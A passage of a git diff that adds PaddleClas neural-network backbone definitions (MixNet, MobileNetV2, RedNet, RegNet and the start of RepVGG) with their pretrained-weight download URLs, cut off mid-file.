raise ValueError("Unsupported MixNet version {}".format(version)) + + final_block_channels = 1536 + + if width_scale != 1.0: + channels = [[round_channels(cij * width_scale) for cij in ci] + for ci in channels] + init_block_channels = round_channels(init_block_channels * width_scale) + + net = MixNet( + channels=channels, + init_block_channels=init_block_channels, + final_block_channels=final_block_channels, + exp_kernel_counts=exp_kernel_counts, + conv1_kernel_counts=conv1_kernel_counts, + conv2_kernel_counts=conv2_kernel_counts, + exp_factors=exp_factors, + se_factors=se_factors, + **kwargs) + + return net + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def MixNet_S(pretrained=False, use_ssld=False, **kwargs): + """ + MixNet-S model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + """ + model = get_mixnet( + version="s", width_scale=1.0, model_name="MixNet_S", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MixNet_S"], use_ssld=use_ssld) + return model + + +def MixNet_M(pretrained=False, use_ssld=False, **kwargs): + """ + MixNet-M model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + """ + model = get_mixnet( + version="m", width_scale=1.0, model_name="MixNet_M", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MixNet_M"], use_ssld=use_ssld) + return model + + +def MixNet_L(pretrained=False, use_ssld=False, **kwargs): + """ + MixNet-S model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + """ + model = get_mixnet( + version="m", width_scale=1.3, model_name="MixNet_L", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MixNet_L"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mobilenet_v2.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mobilenet_v2.py new file mode 100644 index 0000000..b32c025 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mobilenet_v2.py @@ -0,0 +1,287 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MobileNetV2_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x0_25_pretrained.pdparams", + "MobileNetV2_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x0_5_pretrained.pdparams", + "MobileNetV2_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x0_75_pretrained.pdparams", + "MobileNetV2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_pretrained.pdparams", + "MobileNetV2_x1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x1_5_pretrained.pdparams", + "MobileNetV2_x2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV2_x2_0_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + filter_size, + num_filters, + stride, + padding, + channels=None, + num_groups=1, + name=None, + use_cudnn=True): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=num_groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + self._batch_norm = BatchNorm( + num_filters, + param_attr=ParamAttr(name=name + "_bn_scale"), + bias_attr=ParamAttr(name=name + "_bn_offset"), + moving_mean_name=name + "_bn_mean", + moving_variance_name=name + "_bn_variance") + + def forward(self, inputs, if_act=True): + y = self._conv(inputs) + y = self._batch_norm(y) + if if_act: + y = F.relu6(y) + return y + + +class InvertedResidualUnit(nn.Layer): + def __init__(self, num_channels, num_in_filter, num_filters, stride, + filter_size, padding, expansion_factor, name): + super(InvertedResidualUnit, self).__init__() + num_expfilter = int(round(num_in_filter * expansion_factor)) + self._expand_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=num_expfilter, + filter_size=1, + stride=1, + padding=0, + num_groups=1, + name=name + "_expand") + + self._bottleneck_conv = ConvBNLayer( + num_channels=num_expfilter, + num_filters=num_expfilter, + filter_size=filter_size, + stride=stride, + padding=padding, + num_groups=num_expfilter, + use_cudnn=False, + name=name + "_dwise") + + self._linear_conv = ConvBNLayer( + num_channels=num_expfilter, + num_filters=num_filters, + filter_size=1, + stride=1, + padding=0, + num_groups=1, + name=name + "_linear") + + def forward(self, inputs, ifshortcut): + y = self._expand_conv(inputs, if_act=True) + y = self._bottleneck_conv(y, if_act=True) + y = self._linear_conv(y, if_act=False) + if ifshortcut: + y = paddle.add(inputs, y) + return y + + +class InvresiBlocks(nn.Layer): + def __init__(self, in_c, t, c, n, s, name): + super(InvresiBlocks, self).__init__() + + self._first_block = InvertedResidualUnit( + num_channels=in_c, + num_in_filter=in_c, + num_filters=c, + stride=s, + filter_size=3, + padding=1, + expansion_factor=t, + name=name + "_1") + + self._block_list = [] + for i in range(1, n): + block = self.add_sublayer( + name + "_" + str(i + 1), + sublayer=InvertedResidualUnit( + num_channels=c, + num_in_filter=c, + num_filters=c, + stride=1, + filter_size=3, + padding=1, + expansion_factor=t, + name=name + "_" + str(i + 1))) + self._block_list.append(block) + + def forward(self, inputs): + y = self._first_block(inputs, ifshortcut=False) + for block in self._block_list: + y = block(y, ifshortcut=True) + return y + + +class MobileNet(nn.Layer): + def __init__(self, class_num=1000, scale=1.0, prefix_name=""): + super(MobileNet, self).__init__() + self.scale = scale + self.class_num = class_num + + bottleneck_params_list = [ + (1, 16, 1, 1), + (6, 24, 2, 2), + (6, 32, 3, 2), + (6, 64, 4, 2), + (6, 96, 3, 1), + (6, 160, 3, 2), + (6, 320, 1, 1), + ] + + self.conv1 = ConvBNLayer( + num_channels=3, + num_filters=int(32 * scale), + filter_size=3, + stride=2, + padding=1, + name=prefix_name + "conv1_1") + + self.block_list = [] + i = 1 + in_c = int(32 * scale) + for layer_setting in bottleneck_params_list: + t, c, n, s = layer_setting + i += 1 + block = self.add_sublayer( + prefix_name + "conv" + str(i), + sublayer=InvresiBlocks( + in_c=in_c, + t=t, + c=int(c * scale), + n=n, + s=s, + name=prefix_name + "conv" + str(i))) + self.block_list.append(block) + in_c = int(c * scale) + + self.out_c = int(1280 * scale) if scale > 1.0 else 1280 + self.conv9 = ConvBNLayer( + num_channels=in_c, + num_filters=self.out_c, + filter_size=1, + stride=1, + padding=0, + name=prefix_name + "conv9") + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.out = Linear( + self.out_c, + class_num, + weight_attr=ParamAttr(name=prefix_name + "fc10_weights"), + bias_attr=ParamAttr(name=prefix_name + "fc10_offset")) + + def forward(self, inputs): + y = self.conv1(inputs, if_act=True) + for block in self.block_list: + y = block(y) + y = self.conv9(y, if_act=True) + y = self.pool2d_avg(y) + y = paddle.flatten(y, start_axis=1, stop_axis=-1) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def MobileNetV2_x0_25(pretrained=False, use_ssld=False, **kwargs): + model = MobileNet(scale=0.25, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MobileNetV2_x0_25"], use_ssld=use_ssld) + return model + + +def MobileNetV2_x0_5(pretrained=False, use_ssld=False, **kwargs): + model = MobileNet(scale=0.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MobileNetV2_x0_5"], use_ssld=use_ssld) + return model + + +def MobileNetV2_x0_75(pretrained=False, use_ssld=False, **kwargs): + model = MobileNet(scale=0.75, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MobileNetV2_x0_75"], use_ssld=use_ssld) + return model + + +def MobileNetV2(pretrained=False, use_ssld=False, **kwargs): + model = MobileNet(scale=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MobileNetV2"], use_ssld=use_ssld) + return model + + +def MobileNetV2_x1_5(pretrained=False, use_ssld=False, **kwargs): + model = MobileNet(scale=1.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MobileNetV2_x1_5"], use_ssld=use_ssld) + return model + + +def MobileNetV2_x2_0(pretrained=False, use_ssld=False, **kwargs): + model = MobileNet(scale=2.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["MobileNetV2_x2_0"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rednet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rednet.py new file mode 100644 index 0000000..12802d5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rednet.py @@ -0,0 +1,201 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn + +from paddle.vision.models import resnet + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "RedNet26": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet26_pretrained.pdparams", + "RedNet38": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet38_pretrained.pdparams", + "RedNet50": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet50_pretrained.pdparams", + "RedNet101": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet101_pretrained.pdparams", + "RedNet152": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RedNet152_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() + + +class Involution(nn.Layer): + def __init__(self, channels, kernel_size, stride): + super(Involution, self).__init__() + self.kernel_size = kernel_size + self.stride = stride + self.channels = channels + reduction_ratio = 4 + self.group_channels = 16 + self.groups = self.channels // self.group_channels + self.conv1 = nn.Sequential( + ('conv', nn.Conv2D( + in_channels=channels, + out_channels=channels // reduction_ratio, + kernel_size=1, + bias_attr=False)), + ('bn', nn.BatchNorm2D(channels // reduction_ratio)), + ('activate', nn.ReLU())) + self.conv2 = nn.Sequential(('conv', nn.Conv2D( + in_channels=channels // reduction_ratio, + out_channels=kernel_size**2 * self.groups, + kernel_size=1, + stride=1))) + if stride > 1: + self.avgpool = nn.AvgPool2D(stride, stride) + + def forward(self, x): + weight = self.conv2( + self.conv1(x if self.stride == 1 else self.avgpool(x))) + b, c, h, w = weight.shape + weight = weight.reshape( + (b, self.groups, self.kernel_size**2, h, w)).unsqueeze(2) + + out = nn.functional.unfold(x, self.kernel_size, self.stride, + (self.kernel_size - 1) // 2, 1) + out = out.reshape( + (b, self.groups, self.group_channels, self.kernel_size**2, h, w)) + out = (weight * out).sum(axis=3).reshape((b, self.channels, h, w)) + return out + + +class BottleneckBlock(resnet.BottleneckBlock): + def __init__(self, + inplanes, + planes, + stride=1, + downsample=None, + groups=1, + base_width=64, + dilation=1, + norm_layer=None): + super(BottleneckBlock, self).__init__(inplanes, planes, stride, + downsample, groups, base_width, + dilation, norm_layer) + width = int(planes * (base_width / 64.)) * groups + self.conv2 = Involution(width, 7, stride) + + +class RedNet(resnet.ResNet): + def __init__(self, block, depth, class_num=1000, with_pool=True): + super(RedNet, self).__init__( + block=block, depth=50, num_classes=class_num, with_pool=with_pool) + layer_cfg = { + 26: [1, 2, 4, 1], + 38: [2, 3, 5, 2], + 50: [3, 4, 6, 3], + 101: [3, 4, 23, 3], + 152: [3, 8, 36, 3] + } + layers = layer_cfg[depth] + + self.conv1 = None + self.bn1 = None + self.relu = None + self.inplanes = 64 + self.class_num = class_num + self.stem = nn.Sequential( + nn.Sequential( + ('conv', nn.Conv2D( + in_channels=3, + out_channels=self.inplanes // 2, + kernel_size=3, + stride=2, + padding=1, + bias_attr=False)), + ('bn', nn.BatchNorm2D(self.inplanes // 2)), + ('activate', nn.ReLU())), + Involution(self.inplanes // 2, 3, 1), + nn.BatchNorm2D(self.inplanes // 2), + nn.ReLU(), + nn.Sequential( + ('conv', nn.Conv2D( + in_channels=self.inplanes // 2, + out_channels=self.inplanes, + kernel_size=3, + stride=1, + padding=1, + bias_attr=False)), ('bn', nn.BatchNorm2D(self.inplanes)), + ('activate', nn.ReLU()))) + + self.layer1 = self._make_layer(block, 64, layers[0]) + self.layer2 = self._make_layer(block, 128, layers[1], stride=2) + self.layer3 = self._make_layer(block, 256, layers[2], stride=2) + self.layer4 = self._make_layer(block, 512, layers[3], stride=2) + + def forward(self, x): + x = self.stem(x) + x = self.maxpool(x) + + x = self.layer1(x) + x = self.layer2(x) + x = self.layer3(x) + x = self.layer4(x) + + if self.with_pool: + x = self.avgpool(x) + + if self.class_num > 0: + x = paddle.flatten(x, 1) + x = self.fc(x) + + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def RedNet26(pretrained=False, **kwargs): + model = RedNet(BottleneckBlock, 26, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["RedNet26"]) + return model + + +def RedNet38(pretrained=False, **kwargs): + model = RedNet(BottleneckBlock, 38, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["RedNet38"]) + return model + + +def RedNet50(pretrained=False, **kwargs): + model = RedNet(BottleneckBlock, 50, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["RedNet50"]) + return model + + +def RedNet101(pretrained=False, **kwargs): + model = RedNet(BottleneckBlock, 101, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["RedNet101"]) + return model + + +def RedNet152(pretrained=False, **kwargs): + model = RedNet(BottleneckBlock, 152, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["RedNet152"]) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/regnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/regnet.py new file mode 100644 index 0000000..549bd16 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/regnet.py @@ -0,0 +1,429 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "RegNetX_200MF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetX_200MF_pretrained.pdparams", + "RegNetX_4GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetX_4GF_pretrained.pdparams", + "RegNetX_32GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetX_32GF_pretrained.pdparams", + "RegNetY_200MF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetY_200MF_pretrained.pdparams", + "RegNetY_4GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetY_4GF_pretrained.pdparams", + "RegNetY_32GF": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RegNetY_32GF_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def quantize_float(f, q): + """Converts a float to closest non-zero int divisible by q.""" + return int(round(f / q) * q) + + +def adjust_ws_gs_comp(ws, bms, gs): + """Adjusts the compatibility of widths and groups.""" + ws_bot = [int(w * b) for w, b in zip(ws, bms)] + gs = [min(g, w_bot) for g, w_bot in zip(gs, ws_bot)] + ws_bot = [quantize_float(w_bot, g) for w_bot, g in zip(ws_bot, gs)] + ws = [int(w_bot / b) for w_bot, b in zip(ws_bot, bms)] + return ws, gs + + +def get_stages_from_blocks(ws, rs): + """Gets ws/ds of network at each stage from per block values.""" + ts = [ + w != wp or r != rp + for w, wp, r, rp in zip(ws + [0], [0] + ws, rs + [0], [0] + rs) + ] + s_ws = [w for w, t in zip(ws, ts[:-1]) if t] + s_ds = np.diff([d for d, t in zip(range(len(ts)), ts) if t]).tolist() + return s_ws, s_ds + + +def generate_regnet(w_a, w_0, w_m, d, q=8): + """Generates per block ws from RegNet parameters.""" + assert w_a >= 0 and w_0 > 0 and w_m > 1 and w_0 % q == 0 + ws_cont = np.arange(d) * w_a + w_0 + ks = np.round(np.log(ws_cont / w_0) / np.log(w_m)) + ws = w_0 * np.power(w_m, ks) + ws = np.round(np.divide(ws, q)) * q + num_stages, max_stage = len(np.unique(ws)), ks.max() + 1 + ws, ws_cont = ws.astype(int).tolist(), ws_cont.tolist() + return ws, num_stages, max_stage, ws_cont + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + padding=0, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=groups, + weight_attr=ParamAttr(name=name + ".conv2d.output.1.w_0"), + bias_attr=ParamAttr(name=name + ".conv2d.output.1.b_0")) + bn_name = name + "_bn" + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + ".output.1.w_0"), + bias_attr=ParamAttr(bn_name + ".output.1.b_0"), + moving_mean_name=bn_name + "_mean", + moving_variance_name=bn_name + "_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + bm, + gw, + se_on, + se_r, + shortcut=True, + name=None): + super(BottleneckBlock, self).__init__() + + # Compute the bottleneck width + w_b = int(round(num_filters * bm)) + # Compute the number of groups + num_gs = w_b // gw + self.se_on = se_on + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=w_b, + filter_size=1, + padding=0, + act="relu", + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=w_b, + num_filters=w_b, + filter_size=3, + stride=stride, + padding=1, + groups=num_gs, + act="relu", + name=name + "_branch2b") + if se_on: + w_se = int(round(num_channels * se_r)) + self.se_block = SELayer( + num_channels=w_b, + num_filters=w_b, + reduction_ratio=w_se, + name=name + "_branch2se") + self.conv2 = ConvBNLayer( + num_channels=w_b, + num_filters=num_filters, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + if self.se_on: + conv1 = self.se_block(conv1) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, num_channels, num_filters, reduction_ratio, name=None): + super(SELayer, self).__init__() + + self.pool2d_gap = AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + "_sqz_offset")) + + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_filters, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_exc_weights"), + bias_attr=ParamAttr(name=name + "_exc_offset")) + + def forward(self, input): + pool = self.pool2d_gap(input) + pool = paddle.reshape(pool, shape=[-1, self._num_channels]) + squeeze = self.squeeze(pool) + squeeze = F.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = F.sigmoid(excitation) + excitation = paddle.reshape( + excitation, shape=[-1, self._num_channels, 1, 1]) + out = input * excitation + return out + + +class RegNet(nn.Layer): + def __init__(self, + w_a, + w_0, + w_m, + d, + group_w, + bot_mul, + q=8, + se_on=False, + class_num=1000): + super(RegNet, self).__init__() + + # Generate RegNet ws per block + b_ws, num_s, max_s, ws_cont = generate_regnet(w_a, w_0, w_m, d, q) + # Convert to per stage format + ws, ds = get_stages_from_blocks(b_ws, b_ws) + # Generate group widths and bot muls + gws = [group_w for _ in range(num_s)] + bms = [bot_mul for _ in range(num_s)] + # Adjust the compatibility of ws and gws + ws, gws = adjust_ws_gs_comp(ws, bms, gws) + # Use the same stride for each stage + ss = [2 for _ in range(num_s)] + # Use SE for RegNetY + se_r = 0.25 + # Construct the model + # Group params by stage + stage_params = list(zip(ds, ws, ss, bms, gws)) + # Construct the stem + stem_type = "simple_stem_in" + stem_w = 32 + block_type = "res_bottleneck_block" + + self.conv = ConvBNLayer( + num_channels=3, + num_filters=stem_w, + filter_size=3, + stride=2, + padding=1, + act="relu", + name="stem_conv") + + self.block_list = [] + for block, (d, w_out, stride, bm, gw) in enumerate(stage_params): + shortcut = False + for i in range(d): + num_channels = stem_w if block == i == 0 else in_channels + # Stride apply to the first block of the stage + b_stride = stride if i == 0 else 1 + conv_name = "s" + str(block + 1) + "_b" + str(i + + 1) # chr(97 + i) + bottleneck_block = self.add_sublayer( + conv_name, + BottleneckBlock( + num_channels=num_channels, + num_filters=w_out, + stride=b_stride, + bm=bm, + gw=gw, + se_on=se_on, + se_r=se_r, + shortcut=shortcut, + name=conv_name)) + in_channels = w_out + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = w_out + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_0.w_0"), + bias_attr=ParamAttr(name="fc_0.b_0")) + + def forward(self, inputs): + y = self.conv(inputs) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def RegNetX_200MF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=36.44, + w_0=24, + w_m=2.49, + d=13, + group_w=8, + bot_mul=1.0, + q=8, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_200MF"], use_ssld=use_ssld) + return model + + +def RegNetX_4GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=38.65, + w_0=96, + w_m=2.43, + d=23, + group_w=40, + bot_mul=1.0, + q=8, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_4GF"], use_ssld=use_ssld) + return model + + +def RegNetX_32GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=69.86, + w_0=320, + w_m=2.0, + d=23, + group_w=168, + bot_mul=1.0, + q=8, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model + + +def RegNetY_200MF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=36.44, + w_0=24, + w_m=2.49, + d=13, + group_w=8, + bot_mul=1.0, + q=8, + se_on=True, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model + + +def RegNetY_4GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=31.41, + w_0=96, + w_m=2.24, + d=22, + group_w=64, + bot_mul=1.0, + q=8, + se_on=True, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model + + +def RegNetY_32GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=115.89, + w_0=232, + w_m=2.53, + d=20, + group_w=232, + bot_mul=1.0, + q=8, + se_on=True, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/repvgg.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/repvgg.py new file mode 100644 index 0000000..94b9355 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/repvgg.py @@ -0,0 +1,406 @@ +import paddle.nn as nn +import paddle +import numpy as np + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "RepVGG_A0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_A0_pretrained.pdparams", + "RepVGG_A1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_A1_pretrained.pdparams", + "RepVGG_A2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_A2_pretrained.pdparams", + "RepVGG_B0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B0_pretrained.pdparams", + "RepVGG_B1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B1_pretrained.pdparams", + "RepVGG_B2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B2_pretrained.pdparams", + "RepVGG_B3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B3_pretrained.pdparams", + "RepVGG_B1g2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B1g2_pretrained.pdparams", + "RepVGG_B1g4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B1g4_pretrained.pdparams", + "RepVGG_B2g2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B2g2_pretrained.pdparams", + "RepVGG_B2g4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B2g4_pretrained.pdparams", + "RepVGG_B3g2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B3g2_pretrained.pdparams", + "RepVGG_B3g4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B3g4_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + +optional_groupwise_layers = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26] +g2_map = {l: 2 for l in optional_groupwise_layers} +g4_map = {l: 4 for l in optional_groupwise_layers} + + +class ConvBN(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + groups=1): + super(ConvBN, self).__init__() + self.conv = nn.Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + groups=groups, + bias_attr=False) + self.bn = nn.BatchNorm2D(num_features=out_channels) + + def forward(self, x): + y = self.conv(x) + y = self.bn(y) + return y + + +class RepVGGBlock(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride=1, + padding=0, + dilation=1, + groups=1, + padding_mode='zeros'): + super(RepVGGBlock, self).__init__() + self.in_channels = in_channels + self.out_channels = out_channels + self.kernel_size = kernel_size + self.stride = stride + self.padding = padding + self.dilation = dilation + self.groups = groups + self.padding_mode = padding_mode + + assert kernel_size == 3 + assert 